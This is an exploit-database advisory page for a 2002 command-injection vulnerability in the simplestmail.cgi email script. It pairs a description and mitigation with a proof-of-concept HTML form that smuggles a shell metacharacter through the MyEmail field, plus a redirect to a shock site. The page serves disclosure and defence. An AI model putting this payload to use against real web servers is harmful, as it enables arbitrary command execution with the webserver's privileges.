header-logo
Suggest Exploit
vendor:
Simplestmail.cgi
by:
Leif M. Wright
7.5
CVSS
HIGH
Command Injection
78
CWE
Product Name: Simplestmail.cgi
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2002

Leif M. Wright’s Simplestmail.cgi Vulnerability

An insecurely-structured call to the open() function leads to a failure to properly filter shell metacharacters from user supplied input. As a result, it is possible for an attacker to cause this script to execute arbitrary shell commands with the privilege of the webserver.

Mitigation:

Input validation should be used to ensure that user supplied data is properly filtered and does not contain malicious shell metacharacters.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/2102/info

A vulnerabiliy exists in Leif M. Wright's simplestmail.cgi, a script designed to coordinate email responses from web forms.

An insecurely-structured call to the open() function leads to a failure to properly filter shell metacharacters from user supplied input. As a result, it is possible for an attacker to cause this script to execute arbitrary shell commands with the privilege of the webserver. 

<html>
<form action="http://someplace/cgi-bin/simplestmail.cgi" method=POST>
Command: <input type=text name=MyEmail value=";">
<input type=hidden name=redirect value="http://goatse.cx">
<input type=submit name=submit value="run">
</form>
</html>